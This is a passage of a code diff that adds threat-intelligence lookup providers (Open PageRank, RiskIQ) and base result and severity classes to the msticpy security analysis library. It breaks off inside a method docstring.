+        query_params[query_def_params["ioc"]] = ioc
+        if "start" in kwargs:
+            query_params["start"] = kwargs["start"]
+        if "end" in kwargs:
+            query_params["end"] = kwargs["end"]
+
+        query_obj = getattr(self._query_provider, query_name, None)
+        if not query_obj:
+            raise ValueError(
+                f"No query object name for {query_name} found in provider."
+            )
+
+        return query_obj, query_params
+
+    @staticmethod
+    def _series_to_list(series: pd.Series) -> List[Any]:
+        return list(series.dropna().unique())
+
+    @staticmethod
+    def _combine_results(
+        input_df: pd.DataFrame, results_df: pd.DataFrame, reslt_ioc_key: str
+    ) -> pd.DataFrame:
+        # Clean out unwanted columns from the results and merge with
+        # the original IoCList
+        # If we have results, we need to create our summary columns
+        # merge the results with our original IoC set
+        # and drop all of the columns that we are not interested in
+        columns_to_drop = set(results_df.columns.to_list())
+        colums_to_keep = {
+            reslt_ioc_key,
+            "Result",
+            "Status",
+            "Severity",
+            "Details",
+            "RawResult",
+        }
+        columns_to_drop = columns_to_drop - colums_to_keep
+
+        cleaned_results_df = results_df.copy().drop(columns=columns_to_drop)
+        combined_df = input_df.copy()
+        combined_df["IoCKey"] = input_df["Ioc"].str.lower()
+        cleaned_results_df = cleaned_results_df.rename(
+            columns={reslt_ioc_key: "IoCKey"}
+        )
+        combined_df = combined_df.merge(
+            right=cleaned_results_df, how="left", on="IoCKey"
+        ).drop(columns="IoCKey")
+        # Fill in any NaN values from the merge
+        combined_df["Result"] = combined_df["Result"].fillna(False)
+        combined_df["Details"] = combined_df["Details"].fillna("Not found.")
+        combined_df["Status"] = combined_df["Status"].fillna(TILookupStatus.ok.value)
+        combined_df["Severity"] = combined_df["Severity"].fillna(
+            TISeverity.information.value
+        )
+        return combined_df
diff --git a/msticpy/sectools/tiproviders/open_page_rank.py b/msticpy/sectools/tiproviders/open_page_rank.py
new file mode 100644
index 000000000..734e5e3dd
--- /dev/null
+++ b/msticpy/sectools/tiproviders/open_page_rank.py
@@ -0,0 +1,241 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Open Page Rank Provider.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+from json import JSONDecodeError
+from typing import Any, Tuple, Union, Iterable, Dict, List
+
+import attr
+import pandas as pd
+
+from .ti_provider_base import LookupResult, TISeverity, generate_items, TILookupStatus
+from .http_base import HttpProvider, IoCLookupParams
+from ...common.utility import export
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@export
+class OPR(HttpProvider):
+    """Open PageRank Lookup."""
+
+    _BASE_URL = "https://openpagerank.com"
+
+    _IOC_QUERIES = {
+        "dns": IoCLookupParams(
+            path="/api/v1.0/getPageRank",
+            params={"domains[0]": "{observable}"},
+            headers={"API-OPR": "{API_KEY}"},
+        )
+    }
+
+    _REQUIRED_PARAMS = ["API_KEY"]
+
+    def __init__(self, **kwargs):
+        """Initialize a new instance of the class."""
+        super().__init__(**kwargs)
+
+        self._provider_name = self.__class__.__name__
+        print(
+            "Using Open PageRank.",
+            "See https://www.domcop.com/openpagerank/what-is-openpagerank",
+        )
+
+    # pylint: disable=duplicate-code
+    def lookup_iocs(
+        self,
+        data: Union[pd.DataFrame, Dict[str, str], Iterable[str]],
+        obs_col: str = None,
+        ioc_type_col: str = None,
+        query_type: str = None,
+        **kwargs,
+    ) -> pd.DataFrame:
+        """
+        Lookup collection of IoC observables.
+
+        Parameters
+        ----------
+        data : Union[pd.DataFrame, Dict[str, str], Iterable[str]]
+            Data input in one of three formats:
+            1. Pandas dataframe (you must supply the column name in
+            `obs_col` parameter)
+            2. Dict of observable, IoCType
+            3. Iterable of observables - IoCTypes will be inferred
+        obs_col : str, optional
+            DataFrame column to use for observables, by default None
+        ioc_type_col : str, optional
+            DataFrame column to use for IoCTypes, by default None
+        query_type : str, optional
+            Specify the data subtype to be queried, by default None.
+            If not specified the default record type for the IoC type
+            will be returned.
+
+        Returns
+        -------
+        pd.DataFrame
+            DataFrame of results.
+
+        """
+        kwargs.get("provider_name", self.__class__.__name__)
+
+        domain_list = set()
+        bad_requests: List[pd.Series] = []
+        for ioc, ioc_type in generate_items(data, obs_col, ioc_type_col):
+            if not ioc:
+                continue
+            result = self._check_ioc_type(
+                ioc=ioc, ioc_type=ioc_type, query_subtype=query_type
+            )
+
+            if result.status == TILookupStatus.ok.value:
+                domain_list.add(result.ioc)
+            else:
+                bad_requests.append(pd.Series(attr.asdict(result)))
+
+        results: List[pd.Series] = []
+        if not domain_list:
+            return pd.DataFrame(columns=LookupResult.column_map())
+        for item_result in self._lookup_bulk_request(domain_list):  # type: ignore
+            results.append(pd.Series(attr.asdict(item_result)))
+
+        all_results = results + bad_requests
+        return pd.DataFrame(data=all_results).rename(columns=LookupResult.column_map())
+
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+        if self._failed_response(response) or not isinstance(response.raw_result, dict):
+            return False, TISeverity.information, "Not found."
+
+        severity = TISeverity.information
+        if "response" in response.raw_result:
+            dom_records = response.raw_result["response"]
+            dom_record = dom_records[0]
+            return self._parse_one_record(dom_record)
+        return True, severity, {}
+
+    def _parse_multi_results(self, response: LookupResult) -> Iterable[LookupResult]:
+        """Parse details of batch response."""
+        if not isinstance(response.raw_result, dict):
+            new_result = LookupResult(**attr.asdict(response))
+            new_result.result = False
+            new_result.set_severity(TISeverity.information)
+            new_result.details = "Not found."
+            yield new_result
+        elif "response" in response.raw_result:
+            dom_records = response.raw_result["response"]
+            for dom_record in dom_records:
+                result, sev, details = self._parse_one_record(dom_record)
+                domain_name = dom_record["domain"]
+                new_result = LookupResult(ioc=domain_name, ioc_type="dns")
+                new_result.ioc = domain_name
+                new_result.provider = self._provider_name
+                new_result.result = result
+                new_result.set_severity(sev)
+                new_result.details = details
+                new_result.raw_result = dom_record
+                new_result.reference = f"{response.reference}?domains[0]={domain_name}"
+                yield new_result
+
+    @staticmethod
+    def _parse_one_record(dom_record: dict):
+        record_status = dom_record.get("status_code", 404)
+        severity = TISeverity.information
+        if record_status == 200:
+            return (
+                True,
+                severity,
+                {
+                    "rank": dom_record.get("rank", "0"),
+                    "page_rank": dom_record.get("page_rank_decimal", 0),
+                    "error": dom_record.get("error", ""),
+                },
+            )
+        if record_status == 404:
+            return (
+                True,
+                TISeverity.warning,
+                {
+                    "rank": dom_record.get("rank", "0"),
+                    "error": dom_record.get("error", ""),
+                },
+            )
+        return False, TISeverity.information, {}
+
+    def _lookup_bulk_request(self, ioc_list: Iterable[str]) -> Iterable[LookupResult]:
+        ioc_list = list(ioc_list)
+        batch_size = 100
+
+        l_len = len(ioc_list)
+        for step in range(0, l_len, batch_size):
+            batch_list = ioc_list[step : (step + batch_size)]  # noqa: E203
+            for result in self._lookup_batch(batch_list):
+                yield result
+
+    # pylint: disable=duplicate-code
+    def _lookup_batch(self, ioc_list: list) -> Iterable[LookupResult]:
+        # build the query string manually - of the form domains[N]=domN&domains[N+1]...
+        qry_elements = []
+        for idx, dom in zip(range(0, len(ioc_list)), ioc_list):
+            qry_elements.append(f"domains[{idx}]={dom}")
+        qry_str = "&".join(qry_elements)
+        path = self._IOC_QUERIES["dns"].path
+        req_url = f"{self._BASE_URL}{path}?{qry_str}"
+
+        try:
+            _, req_params = self._substitute_parms("dummy", "dns", None)
+            response = self._httpx_client.get(
+                url=req_url, headers=req_params["headers"]
+            )
+            result = LookupResult(ioc=",".join(ioc_list), ioc_type="dns")
+            if response.status_code == 200:
+                result.status = TILookupStatus.ok.value
+                result.reference = self._BASE_URL + path
+                result.raw_result = response.json()
+                for single_result in self._parse_multi_results(result):
+                    yield single_result
+            else:
+                result.raw_result = str(response)
+                result.result = False
+                result.reference = req_url
+                result.status = response.status_code
+                result.details = "No response from provider."
+                yield result
+        except (
+            LookupError,
+            JSONDecodeError,
+            NotImplementedError,
+            ConnectionError,
+        ) as err:
+            self._err_to_results(result, err)
+            if not isinstance(err, LookupError):
+                result.reference = req_url
+            yield result
+
+    # pylint: enable=duplicate-code
diff --git a/msticpy/sectools/tiproviders/riskiq.py b/msticpy/sectools/tiproviders/riskiq.py
new file mode 100644
index 000000000..6ae6cd5ca
--- /dev/null
+++ b/msticpy/sectools/tiproviders/riskiq.py
@@ -0,0 +1,391 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+RiskIQ Threat Intelligence Provider.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+from datetime import datetime
+from functools import partial
+from typing import Any, Tuple, Optional, Union
+
+
+from passivetotal import analyzer as ptanalyzer
+
+from .ti_provider_base import (
+    TIProvider,
+    LookupResult,
+    TISeverity,
+    TILookupStatus,
+    TIPivotProvider,
+)
+from ...common.utility import export
+from ...common.exceptions import MsticpyUserError
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Mark Kendrick"
+
+
+@export
+class RiskIQ(TIProvider, TIPivotProvider):
+    """RiskIQ Threat Intelligence Lookup."""
+
+    _IOC_QUERIES: dict = {
+        "ipv4": "ALL",
+        "ipv4-articles": "articles",
+        "ipv4-artifacts": "artifacts",
+        "ipv4-certificates": "certificates",
+        "ipv4-components": "components",
+        "ipv4-cookies": "cookies",
+        "ipv4-hostpairchildren": "hostpair_children",
+        "ipv4-hostpairparents": "hostpair_parents",
+        "ipv4-passivedns": "resolutions",
+        "ipv4-projects": "projects",
+        "ipv4-malware": "malware",
+        "ipv4-rep": "reputation",
+        "ipv4-services": "services",
+        "ipv4-summary": "summary",
+        "ipv4-trackers": "trackers",
+        "ipv4-whois": "whois",
+        "hostname": "ALL",
+        "hostname-articles": "articles",
+        "hostname-artifacts": "artifacts",
+        "hostname-certificates": "certificates",
+        "hostname-components": "components",
+        "hostname-cookies": "cookies",
+        "hostname-hostpairchildren": "hostpair_children",
+        "hostname-hostpairparents": "hostpair_parents",
+        "hostname-passivedns": "resolutions",
+        "hostname-projects": "projects",
+        "hostname-malware": "malware",
+        "hostname-rep": "reputation",
+        "hostname-summary": "summary",
+        "hostname-trackers": "trackers",
+        "hostname-whois": "whois",
+    }
+
+    # Aliases
+    _IOC_QUERIES["dns"] = _IOC_QUERIES["hostname"]
+    _IOC_QUERIES["dns-articles"] = _IOC_QUERIES["hostname-articles"]
+    _IOC_QUERIES["dns-artifacts"] = _IOC_QUERIES["hostname-artifacts"]
+    _IOC_QUERIES["dns-certificates"] = _IOC_QUERIES["hostname-certificates"]
+    _IOC_QUERIES["dns-components"] = _IOC_QUERIES["hostname-components"]
+    _IOC_QUERIES["dns-cookies"] = _IOC_QUERIES["hostname-cookies"]
+    _IOC_QUERIES["dns-hostpairchildren"] = _IOC_QUERIES["hostname-hostpairchildren"]
+    _IOC_QUERIES["dns-hostpairparents"] = _IOC_QUERIES["hostname-hostpairparents"]
+    _IOC_QUERIES["dns-passivedns"] = _IOC_QUERIES["hostname-passivedns"]
+    _IOC_QUERIES["dns-projects"] = _IOC_QUERIES["hostname-projects"]
+    _IOC_QUERIES["dns-malware"] = _IOC_QUERIES["hostname-malware"]
+    _IOC_QUERIES["dns-rep"] = _IOC_QUERIES["hostname-rep"]
+    _IOC_QUERIES["dns-summary"] = _IOC_QUERIES["hostname-summary"]
+    _IOC_QUERIES["dns-trackers"] = _IOC_QUERIES["hostname-trackers"]
+    _IOC_QUERIES["dns-whois"] = _IOC_QUERIES["hostname-whois"]
+
+    _PIVOT_ENTITIES = {
+        prop: {"Dns": "DomainName", "IpAddress": "Address", "Host": "fqdn"}
+        for prop in [
+            "articles",
+            "artifacts",
+            "certificates",
+            "components",
+            "cookies",
+            "hostpair_children",
+            "hostpair_parents",
+            "resolutions",
+            "projects",
+            "malware",
+            "reputation",
+            "summary",
+            "trackers",
+            "whois",
+        ]
+    }
+    _PIVOT_ENTITIES["services"] = {"IpAddress": "Address"}
+
+    _REFERENCE = "https://community.riskiq.com"
+
+    def __init__(self, **kwargs):
+        """Instantiate RiskIQ class."""
+        super().__init__(**kwargs)
+        ptanalyzer.init(username=kwargs.get("ApiID"), api_key=kwargs.get("AuthKey"))
+        self._pivot_timespan_start: Optional[datetime] = None
+        self._pivot_timespan_end: Optional[datetime] = None
+        self._pivot_get_timespan: Any = None
+
+    # pylint: disable=no-self-use
+    @property
+    def _httpx_client(self):
+        """Return the PT Analyzer session."""
+        return ptanalyzer.api_clients["Cards"].session
+
+    @_httpx_client.setter
+    def _httpx_client(self, session):
+        """Set the PT Analyzer session."""
+        # pylint: disable=consider-using-dict-items
+        for name in ptanalyzer.api_clients:
+            ptanalyzer.api_clients[name].session = session
+
+    # pylint: enable=no-self-use
+
+    @staticmethod
+    def _severity_rep(classification):
+        """Get the severity level for a reputation score classification."""
+        return {
+            "MALICIOUS": TISeverity.high,
+            "SUSPICIOUS": TISeverity.warning,
+            "UNKNOWN": TISeverity.information,
+            "GOOD": TISeverity.information,
+        }.get(classification, TISeverity.information)
+
+    def lookup_ioc(
+        self, ioc: str, ioc_type: str = None, query_type: str = None, **kwargs
+    ) -> LookupResult:
+        """
+        Lookup a single IoC observable.
+
+        Parameters
+        ----------
+        ioc : str
+            IoC Observable value
+        ioc_type : str, optional
+            IoC Type, by default None (type will be inferred)
+        query_type : str, optional
+            Specify the data subtype to be queried, by default None.
+            If not specified the default record type for the IoC type
+            will be returned.
+
+        Returns
+        -------
+        LookupResult
+            The returned results.
+
+        """
+        result = self._check_ioc_type(
+            ioc=ioc, ioc_type=ioc_type, query_subtype=query_type
+        )
+
+        if result.status:
+            return result
+
+        result.provider = kwargs.get("provider_name", self.__class__.__name__)
+        result.reference = self._REFERENCE
+
+        if query_type is None:
+            prop = "ALL"
+        elif query_type not in [
+            q.split("-", maxsplit=1)[-1] for q in self._IOC_QUERIES
+        ]:
+            result.result = False
+            result.status = TILookupStatus.query_failed.value
+            result.details = f"ERROR: unsupported query type {query_type}"
+            return result
+        else:
+            prop = self._IOC_QUERIES.get(f"{result.ioc_type}-{query_type}", "ALL")
+
+        try:
+            ptanalyzer.set_context("msticpy", "ti", VERSION, prop)
+            pt_obj = ptanalyzer.get_object(ioc)
+            if prop == "ALL":
+                result = self._parse_result_all_props(pt_obj, result)
+            else:
+                result = self._parse_result_prop(pt_obj, prop, result)
+        except ptanalyzer.AnalyzerError as err:
+            result.result = False
+            result.status = TILookupStatus.query_failed.value
+            result.details = f"ERROR: {err}"
+            result.raw_result = err
+            result.set_severity(TISeverity.unknown)
+
+        return result
+
+    def _parse_result_all_props(self, pt_result, ti_result):
+        """Parse results for ALL properties."""
+        ti_result.details = {
+            "summary": pt_result.summary.as_dict,
+            "reputation": pt_result.reputation.as_dict,
+        }
+        ti_result.raw_result = ti_result.details
+        if pt_result.summary.total == 0 and pt_result.reputation.score == 0:
+            ti_result.result = False
+        else:
+            ti_result.result = True
+        rep_severity = self._severity_rep(pt_result.reputation.classification)
+        ti_result.set_severity(rep_severity)
+        if (
+            "malware_hashes" in pt_result.summary.available
+            or "articles" in pt_result.summary.available
+        ):
+            ti_result.set_severity(max(rep_severity, TISeverity.high))
+        elif "projects" in pt_result.summary.available:
+            ti_result.set_severity(max(rep_severity, TISeverity.warning))
+        return ti_result
+
+    def _parse_result_prop(self, pt_result, pt_prop, ti_result):
+        """Parse result for a specific property."""
+        attr = getattr(pt_result, pt_prop)
+        if pt_prop == "reputation":
+            ti_result.set_severity(self._severity_rep(attr.classification))
+        elif pt_prop == "malware_hashes" and len(attr) > 0:
+            ti_result.set_severity(TISeverity.high)
+        else:
+            ti_result.set_severity(TISeverity.information)
+        ti_result.details = ti_result.raw_result = attr.as_dict
+        ti_result.result = True
+        return ti_result
+
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+        return (True, TISeverity.information, None)
+
+    def _set_pivot_timespan(self, **kwargs):
+        """
+        Set the pivot timespan and track whether it has changed.
+
+        Returns
+        -------
+        bool
+            whether the timespan changed.
+
+        """
+        changed = False
+        start = kwargs.pop(
+            "start",
+            self._pivot_get_timespan().start if self._pivot_get_timespan else None,
+        )
+        end = kwargs.pop(
+            "end", self._pivot_get_timespan().end if self._pivot_get_timespan else None
+        )
+        if (
+            start
+            and end
+            and (start != self._pivot_timespan_start or end != self._pivot_timespan_end)
+        ):
+            changed = True
+            self._pivot_timespan_start = start
+            self._pivot_timespan_end = end
+            ptanalyzer.set_date_range(start_date=start, end_date=end)
+        return changed
+
+    def pivot_value(self, prop, host, **kwargs):
+        """Perform a pivot on a single value."""
+        ts_changed = self._set_pivot_timespan(**kwargs)
+        ptanalyzer.set_context("msticpy", "pivot", VERSION, prop)
+        obj = ptanalyzer.get_object(host)
+        if ts_changed and prop not in ["reputation", "summary", "whois"]:
+            obj.reset(prop)
+        try:
+            attrib = getattr(obj, prop)
+        except ptanalyzer.AnalyzerAPIError as err:
+            raise RiskIQAPIUserError(err.message) from err
+        except ptanalyzer.AnalyzerError as err:
+            raise RiskIQUserError("Analyzer error.") from err
+        return attrib.to_dataframe(**kwargs)
+
+    def register_pivots(
+        self,
+        pivot_reg: "PivotRegistration",  # type: ignore # noqa: F821
+        pivot: "Pivot",  # type: ignore # noqa: F821
+    ):
+        """
+        Register pivot functions for the TI Provider.
+
+        Parameters
+        ----------
+        pivot_reg : PivotRegistration
+            Pivot registration settings.
+        pivot : Pivot
+            Pivot library instance
+
+        """
+        self._pivot_get_timespan = pivot.get_timespan
+        self._pivot_timespan_start = None
+        self._pivot_timespan_end = None
+        base_reg = {
+            "entity_container_name": "RiskIQ",
+            "func_df_param_name": "data",
+            "func_df_col_param_name": "host",
+            "func_input_value_arg": "host",
+            "func_out_column_name": "query",
+        }
+        for prop, entity_map in self._PIVOT_ENTITIES.items():
+            reg = pivot_reg(
+                func_new_name=prop,
+                func_static_params={"prop": prop},
+                input_type="value",
+                entity_map=entity_map,
+                **base_reg,
+            )
+            fun = partial(self.pivot_value)
+            fun.__doc__ = getattr(
+                ptanalyzer.Hostname, prop, getattr(ptanalyzer.IPAddress, prop)
+            ).__doc__
+            pivot.add_pivot_function(fun, pivot_reg=reg, container="RiskIQ")
+
+
+class RiskIQUserError(MsticpyUserError):
+    """Generic RiskIQ provider exception."""
+
+    def __init__(
+        self, *args, help_uri: Union[Tuple[str, str], str, None] = None, **kwargs
+    ):
+        """
+        Create RiskIQ provider exception.
+
+        Parameters
+        ----------
+        help_uri : Union[Tuple[str, str], str, None], optional
+            Override the default help URI.
+
+        """
+        kwargs.update(title="error using RiskIQ python library")
+        kwargs.update(
+            ptlib_uri=(
+                "RiskIQ PassiveTotal Python Library",
+                "https://passivetotal.readthedocs.io",
+            )
+        )
+        kwargs.update(
+            riqinfo_uri=("RiskIQ Support", "https://www.riskiq.com/resources/support/")
+        )
+        uri = help_uri or self.DEF_HELP_URI
+        super().__init__(*args, help_uri=uri, **kwargs)
+
+
+class RiskIQAPIUserError(RiskIQUserError):
+    """RiskIQ API provider exception."""
+
+    def __init__(self, api_exception: ptanalyzer.AnalyzerAPIError):
+        """
+        Create RiskIQ API exception.
+
+        Parameters
+        ----------
+        api_exception : ptanalyzer.AnalyzerAPIError
+            Underlying API exception.
+
+        """
+        title = f"{api_exception.status_code} {api_exception.message}"
+        super().__init__(title, str(api_exception))
diff --git a/msticpy/sectools/tiproviders/ti_provider_base.py b/msticpy/sectools/tiproviders/ti_provider_base.py
new file mode 100644
index 000000000..d7e81430c
--- /dev/null
+++ b/msticpy/sectools/tiproviders/ti_provider_base.py
@@ -0,0 +1,768 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Module for TILookup classes.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+import abc
+from abc import ABC, abstractmethod
+import collections
+import math  # noqa
+import pprint
+import re
+from collections import Counter, namedtuple
+from enum import Enum
+from functools import lru_cache, singledispatch, total_ordering
+from ipaddress import IPv4Address, IPv6Address, ip_address
+from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Union
+from urllib.parse import quote_plus
+
+import attr
+import pandas as pd
+from urllib3.exceptions import LocationParseError
+from urllib3.util import parse_url
+
+from ..._version import VERSION
+from ...common.utility import export
+from ..iocextract import IoCExtract, IoCType
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+SanitizedObservable = namedtuple("SanitizedObservable", ["observable", "status"])
+
+
+# pylint: disable=too-few-public-methods
+@total_ordering
+class TISeverity(Enum):
+    """Threat intelligence report severity."""
+
+    # pylint: disable=invalid-name
+    unknown = -1
+    information = 0
+    warning = 1
+    high = 2
+
+    # pylint: enable=invalid-name
+
+    # pylint: disable=unsupported-membership-test, no-member
+    @classmethod
+    def parse(cls, value) -> "TISeverity":
+        """
+        Parse string or numeric value to TISeverity.
+
+        Parameters
+        ----------
+        value : Any
+            TISeverity, str or int
+
+        Returns
+        -------
+        TISeverity
+            TISeverity instance.
+
+        """
+        if isinstance(value, TISeverity):
+            return value
+        if isinstance(value, str) and value.lower() in cls.__members__:
+            return cls[value.lower()]
+        if isinstance(value, int) and value in [
+            v.value for v in cls.__members__.values()
+        ]:
+            return cls(value)
+        return TISeverity.unknown
+
+    # pylint: enable=unsupported-membership-test, no-member
+
+    # pylint: disable=comparison-with-callable
+    def __eq__(self, other) -> bool:
+        """
+        Return True if severities are equal.
+
+        Parameters
+        ----------
+        other : Any
+            TISeverity to compare to.
+            Can be a numeric value or name of TISeverity value.
+
+        Returns
+        -------
+        bool
+            If severities are equal
+
+        """
+        other_sev = TISeverity.parse(other)
+        return self.value == other_sev.value
+
+    def __gt__(self, other) -> bool:
+        """
+        Return True self is greater than other.
+
+        Parameters
+        ----------
+        other : Any
+            TISeverity to compare to.
+            Can be a numeric value or name of TISeverity value.
+
+        Returns
+        -------
+        bool
+            If severities are equal
+
+        """
+        other_sev = TISeverity.parse(other)
+        return self.value > other_sev.value
+
+
+# pylint: enable=comparison-with-callable
+# pylint: disable=too-many-instance-attributes
+@attr.s(auto_attribs=True)
+class LookupResult:
+    """Lookup result for IoCs."""
+
+    ioc: str
+    ioc_type: str
+    safe_ioc: str = ""
+    query_subtype: Optional[str] = None
+    provider: Optional[str] = None
+    result: bool = False
+    severity: int = attr.ib(default=0)
+    details: Any = None
+    raw_result: Optional[Union[str, dict]] = None
+    reference: Optional[str] = None
+    status: int = 0
+
+    @severity.validator
+    def _check_severity(self, attribute, value):
+        del attribute
+        if isinstance(value, TISeverity):
+            self.severity = value.name
+            return
+        self.severity = TISeverity.parse(value).name
+
+    @property
+    def summary(self):
+        """Print a summary of the Lookup Result."""
+        p_pr = pprint.PrettyPrinter(indent=4)
+        print("ioc:", self.ioc, "(", self.ioc_type, ")")
+        print("result:", self.result)
+        # print("severity:", self.severity)
+        p_pr.pprint(self.details)
+        print("reference: ", self.reference)
+
+    @property
+    def raw_result_fmtd(self):
+        """Print raw results of the Lookup Result."""
+        p_pr = pprint.PrettyPrinter(indent=4)
+        p_pr.pprint(self.raw_result)
+
+    @property
+    def severity_name(self) -> str:
+        """
+        Return text description of severity score.
+
+        Returns
+        -------
+        str
+            Severity description.
+
+        """
+        try:
+            return TISeverity(self.severity).name
+        except ValueError:
+            return TISeverity.unknown.name
+
+    def set_severity(self, value: Any):
+        """
+        Set the severity from enum, int or string.
+
+        Parameters
+        ----------
+        value : Any
+            The severity value to set
+
+        """
+        self._check_severity(None, value)
+
+    @classmethod
+    def column_map(cls):
+        """Return a dictionary that maps fields to DF Names."""
+        col_mapping = {}
+        for name in attr.fields_dict(cls):
+            out_name = "".join(part.capitalize() for part in name.split("_"))
+            col_mapping[name] = out_name
+        return col_mapping
+
+
+# pylint: enable=too-many-instance-attributes
+
+
+# pylint: disable=too-few-public-methods, invalid-name
+class TILookupStatus(Enum):
+    """Threat intelligence lookup status."""
+
+    ok = 0
+    not_supported = 1
+    bad_format = 2
+    query_failed = 3
+    other = 10
+
+
+# pylint: enable=too-few-public-methods, invalid-name
+
+
+_IOC_EXTRACT = IoCExtract()
+
+
+@export
+class TIProvider(ABC):
+    """Abstract base class for Threat Intel providers."""
+
+    _IOC_QUERIES: Dict[str, Any] = {}
+
+    # pylint: disable=unused-argument
+    def __init__(self, **kwargs):
+        """Initialize the provider."""
+        self._supported_types: Set[IoCType] = set()
+        self.description: Optional[str] = None
+
+        self._supported_types = {
+            IoCType.parse(ioc_type.split("-")[0]) for ioc_type in self._IOC_QUERIES
+        }
+        if IoCType.unknown in self._supported_types:
+            self._supported_types.remove(IoCType.unknown)
+
+        self.require_url_encoding = False
+
+    # pylint: disable=duplicate-code
+    @abc.abstractmethod
+    def lookup_ioc(
+        self, ioc: str, ioc_type: str = None, query_type: str = None, **kwargs
+    ) -> LookupResult:
+        """
+        Lookup a single IoC observable.
+
+        Parameters
+        ----------
+        ioc : str
+            IoC Observable value
+        ioc_type : str, optional
+            IoC Type, by default None (type will be inferred)
+        query_type : str, optional
+            Specify the data subtype to be queried, by default None.
+            If not specified the default record type for the IoC type
+            will be returned.
+
+        Returns
+        -------
+        LookupResult
+            The returned results.
+
+        """
+
+    def lookup_iocs(
+        self,
+        data: Union[pd.DataFrame, Dict[str, str], Iterable[str]],
+        obs_col: str = None,
+        ioc_type_col: str = None,
+        query_type: str = None,
+        **kwargs,
+    ) -> pd.DataFrame:
+        """
+        Lookup collection of IoC observables.
+
+        Parameters
+        ----------
+        data : Union[pd.DataFrame, Dict[str, str], Iterable[str]]
+            Data input in one of three formats:
+            1. Pandas dataframe (you must supply the column name in
+            `obs_col` parameter)
+            2. Dict of observable, IoCType
+            3. Iterable of observables - IoCTypes will be inferred
+        obs_col : str, optional
+            DataFrame column to use for observables, by default None
+        ioc_type_col : str, optional
+            DataFrame column to use for IoCTypes, by default None
+        query_type : str, optional
+            Specify the data subtype to be queried, by default None.
+            If not specified the default record type for the IoC type
+            will be returned.
+
+        Returns
+        -------
+        pd.DataFrame
+            DataFrame of results.
+
+        """
+        results = []
+        for observable, ioc_type in generate_items(data, obs_col, ioc_type_col):
+            if not observable:
+                continue
+            item_result = self.lookup_ioc(
+                ioc=observable, ioc_type=ioc_type, query_type=query_type
+            )
+            results.append(pd.Series(attr.asdict(item_result)))
+
+        return pd.DataFrame(data=results).rename(columns=LookupResult.column_map())
+
+    @abc.abstractmethod
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+
+    @property
+    def supported_types(self) -> List[str]:
+        """
+        Return list of supported IoC types for this provider.
+
+        Returns
+        -------
+        List[str]
+            List of supported type names
+
+        """
+        return [ioc.name for ioc in self._supported_types]
+
+    @property
+    def ioc_query_defs(self) -> Dict[str, Any]:
+        """
+        Return current dictionary of IoC query/request definitions.
+
+        Returns
+        -------
+        Dict[str, Any]
+            IoC query/requist definitions keyed by IoCType
+
+        """
+        return self._IOC_QUERIES
+
+    @classmethod
+    def is_known_type(cls, ioc_type: str) -> bool:
+        """
+        Return True if this a known IoC Type.
+
+        Parameters
+        ----------
+        ioc_type : str
+            IoCType string to test
+
+        Returns
+        -------
+        bool
+            True if known type.
+
+        """
+        return ioc_type in IoCType.__members__ and ioc_type != "unknown"
+
+    @classmethod
+    def usage(cls):
+        """Print usage of provider."""
+        print(f"{cls.__doc__} Supported query types:")
+        for ioc_key in sorted(cls._IOC_QUERIES):
+            ioc_key_elems = ioc_key.split("-", maxsplit=1)
+            if len(ioc_key_elems) == 1:
+                print(f"\tioc_type={ioc_key_elems[0]}")
+            if len(ioc_key_elems) == 2:
+                print(
+                    f"\tioc_type={ioc_key_elems[0]}, ioc_query_type={ioc_key_elems[1]}"
+                )
+
+    def is_supported_type(self, ioc_type: Union[str, IoCType]) -> bool:
+        """
+        Return True if the passed type is supported.
+
+        Parameters
+        ----------
+        ioc_type : Union[str, IoCType]
+            IoC type name or instance
+
+        Returns
+        -------
+        bool
+            True if supported.
+
+        """
+        if isinstance(ioc_type, str):
+            ioc_type = IoCType.parse(ioc_type)
+        return ioc_type.name in self.supported_types
+
+    @staticmethod
+    @lru_cache(maxsize=1024)
+    def resolve_ioc_type(observable: str) -> str:
+        """
+        Return IoCType determined by IoCExtract.
+
+        Parameters
+        ----------
+        observable : str
+            IoC observable string
+
+        Returns
+        -------
+        str
+            IoC Type (or unknown if type could not be determined)
+
+        """
+        return _IOC_EXTRACT.get_ioc_type(observable)
+
+    def _check_ioc_type(
+        self, ioc: str, ioc_type: str = None, query_subtype: str = None
+    ) -> LookupResult:
+        """
+        Check IoC Type and cleans up observable.
+
+        Parameters
+        ----------
+        ioc : str
